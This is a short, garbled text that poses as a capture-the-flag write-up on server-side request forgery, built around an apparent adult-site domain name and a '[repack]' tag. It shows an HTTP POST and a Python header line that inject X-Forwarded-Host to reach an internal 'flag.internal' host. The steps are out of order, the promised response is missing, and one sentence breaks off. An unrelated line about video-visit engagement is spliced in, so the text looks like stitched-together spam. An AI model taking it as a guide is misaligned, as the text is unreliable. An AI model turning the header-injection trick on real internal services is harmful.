Brokenlatinawhores.com [repack]
Thus, we have successfully retrieved the flag via SSRF.
POST /quote HTTP/1.1
Host: brokenlatinawhores.com
X-Forwarded-Host: flag.internal
Content-Type: application/x-www-form-urlencoded
The response is a JSON object:
The average duration per visit typically ranges between four and six minutes, a metric that indicates high user engagement with the hosted video assets.
The server uses requests to forward the request to the mailer service and . By controlling the Host header (or X-Forwarded-Host) we can force the internal request to point to a different host.
# 2. Send request with malicious X-Forwarded-Host header
headers = {"X-Forwarded-Host": "flag.internal"}
The site looks like a quirky online “Latin aphorism” generator that lets you pick a “broken” phrase and then share the result via a short‑link. The flag is hidden somewhere behind the “share” functionality.